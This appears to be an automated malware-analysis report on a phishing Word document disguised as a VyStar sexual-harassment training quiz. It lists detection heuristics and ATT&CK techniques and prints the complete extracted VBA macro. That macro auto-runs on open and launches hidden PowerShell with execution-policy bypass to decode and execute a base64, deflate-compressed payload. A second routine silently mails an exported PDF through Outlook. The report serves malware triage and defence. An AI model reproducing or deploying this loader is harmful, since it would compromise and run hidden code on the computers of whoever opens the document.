Verdict: MALICIOUS
Risk Score: 278

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample contains a VBA macro that executes upon opening the document, as indicated by the Document_Open and OLE_VBA_AUTOEXEC_EXEC heuristics. This macro references PowerShell and uses the Shell() function, strongly suggesting it downloads and executes a second-stage payload. The document body presents a fake training quiz to lure the user into enabling macros.
Heuristics (9)
- VBA macros detected (medium, 6 related findings): OLE_VBA_MACROS. Document contains VBA macro code.
- Potential Shell call in VBA (critical): OLE_VBA_SHELL. Matched line in script: `Shell (xt4)`
- PowerShell reference in VBA (critical): OLE_VBA_PS. Matched line in script: `If Arch = "AMD64" Then fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe" Else`
- CreateObject call (high): OLE_VBA_CREATEOBJ. Matched line in script: `Set OutApp = CreateObject("Outlook.Application") Set OutMail = OutApp.CreateItem(0)`
- VBA p-code auto-exec with execution tokens (high): OLE_VBA_PCODE_AUTOEXEC_EXEC. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low): OLE_VBA_DOCOPEN. Matched line in script: `Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton" Private Sub Document_Open()`
- Environ() call (env variable access) (low): OLE_VBA_ENVIRON. Matched line in script: `Arch = Environ("PROCESSOR_ARCHITECTURE") windir = Environ("windir")`
- Reference to PowerShell (high): SC_STR_POWERSHELL.
- Embedded URL (info): EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs, all found in document text (OLE body):
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4060 bytes | 657fb53c9a6565b3c713805d12c38c7b3caf1c1ffaf2ecaf926e30cf2d3961d6 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Submit, 0, 0, MSForms, CommandButton"
Private Sub Document_Open()
Dim fp2 As String
Dim fp1 As String
Dim xt4 As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
fp2 = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
fp2 = "powershell.exe"
End If
fp1 = "nVRtc9pGEP7Or9jRXGekMZLFi90YjWfi4LihDY5riJ2WYTqHtKALpz"
fp1 = fp1 + "v5dMJgwn/vCquYfO0XnXa1t8+zu8+KPcElvHcak2spB1mujX"
fp1 = fp1 + "WdJRqFstMOEikdbwp5OZMihsJySweuLX2HgbJ31sCDMLbk8k"
fp1 = fp1 + "pKHbu1T+ZXSWKwKJpQCmUheR6JF6yN+WsspdJqvMnf3HdGW4"
fp1 = fp1 + "ytF/1vLn2D3OI4pSN54/JqX1lrxKy0eETK8nj5yuwQTD5jD+"
fp1 = fp1 + "wP7jtueIaEdbi8x6ISbiRfHEe+og0SKsN537Bms2UJddi5+t"
fp1 = fp1 + "C//njz26fB7398Ht5+ufvzfjT++vD47a+/+SxOcL5IxfelzJ"
fp1 = fp1 + "TOn0xhy9XzevMSttqd7tn5r+8unGCs+yk3V8bwjes15qWKK3"
fp1 = fp1 + "SIXbbytmDQltQH150Qu8l0Cmz18w34AUPkRWnQ/zL7Tm0Gf1"
fp1 = fp1 + "RmXkAP+AXCdSsMwccnuGh7u7fsFrZsXrF3olYQdH7MNRUXp7"
fp1 = fp1 + "7ep6BvJ5fAkom7QOsbrhKdgZ/xtcgoK0uCz6gWNvWmu6jmx+"
fp1 = fp1 + "bRUXaELeRGx9Rq2E54RXTK1gRHjxNg/+wiQJUQhTWxL0gNNS"
fp1 = fp1 + "5sXYXP/xn3e1wvUKQF19vtjgAWWyDG4DJxGUZMgC8tnHfp7e"
fp1 = fp1 + "TE27KUkGzElhVgQggYAdQF0hUJgvguKa6oAtKKkYxAzMGlnh"
fp1 = fp1 + "eeB4euUwTB1oZzsfr21aEyJ7dogxGalYjxTtNYhlzxBZppr1"
fp1 = fp1 + "d50fTRWDEXtAn4wKVI9nLqcylnJEvC3DJrStxFLCPjlgquBz"
fp1 = fp1 + "faFBazoEr/iLO+FKhs1GBZ8ImEh6YISL6uUxZofMJT1mmCM9"
fp1 = fp1 + "QvQkp+2g1C4q+znMBmkioejgYf4TxoRfAoqI/PBdyOPceLmC"
fp1 = fp1 + "LQRQSTDxuLe0HlVRuy4Fo/K6l5cs0td53U2rzonZ6etYOzs6"
fp1 = fp1 + "DdagXt9kWv2+2cMuWA12CabhEfv9p00gZmMzTXOBdK7CfEns"
fp1 = fp1 + "C/pc0Ch+A7bQd8RVaR8xhh77mpZ1mAn/OisKkpG2x9yXSv99"
fp1 = fp1 + "OfJ2yyvNZbM1x3wjCkoxt60aRu132prMgwoEVFo/N6MEUw5K"
fp1 = fp1 + "ZIuaSp9HW+cVnehLAJk9d9nrpsTXtERqftel4TDiBVaXTl+I"
fp1 = fp1 + "dDiE22blZHWO2bLq2vSkmi2f9U/JFEzGntMNak6nfn3TDc0f"
fp1 = fp1 + "DjdLv7Fw=="
xt4 = fp2 + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
xt4 = xt4 + "and ""Invoke-Expression $(New-Object IO.StreamRea"
xt4 = xt4 + "der ($(New-Object IO.Compression.DeflateStream ("
xt4 = xt4 + "$(New-Object IO.MemoryStream (,$([Convert]::From"
xt4 = xt4 + "Base64String(\"" " & fp1 & " \"" )))), [IO.Compr"
xt4 = xt4 + "ession.CompressionMode]::Decompress)), [Text.Enc"
xt4 = xt4 + "oding]::ASCII)).ReadToEnd();"""
Shell (xt4)
End Sub
Sub Mail_Workbook_1(vPath As String)
Dim OutApp As Object
Dim OutMail As Object
Set OutApp = CreateObject("Outlook.Application")
Set OutMail = OutApp.CreateItem(0)
On Error Resume Next
With OutMail
.To = "hr.training@vystar.training"
.CC = ""
.BCC = ""
.Subject = "VyStar Sexual Harassment & Diversity Training"
.Body = "I have completed the sexual harassment & diversity training!"
.Attachments.Add vPath
.Send
End With
On Error GoTo 0
Set OutMail = Nothing
Set OutApp = Nothing
MsgBox "Your training has been submitted successfully!", vbOKOnly, "Thank you"
End Sub
Private Sub Submit_Click()
Dim vDoc As Object
Dim vPath As String
vPath = ActiveDocument.Path & Application.PathSeparator & "VyStar_SHD_Training.pdf"
ActiveDocument.ExportAsFixedFormat OutputFileName:=vPath, _
ExportFormat:=wdExportFormatPDF, OpenAfterExport:=False, OptimizeFor:= _
wdExportOptimizeForPrint, Range:=wdExportAllDocument, From:=1, To:=1, _
Item:=wdExportDocumentWithMarkup, IncludeDocProps:=False, KeepIRM:=True, _
CreateBookmarks:=wdExportCreateNoBookmarks, DocStructureTags:=True, _
BitmapMissingFonts:=True, UseISO19005_1:=False
Call Mail_Workbook_1(vPath)
Kill vPath
End Sub
```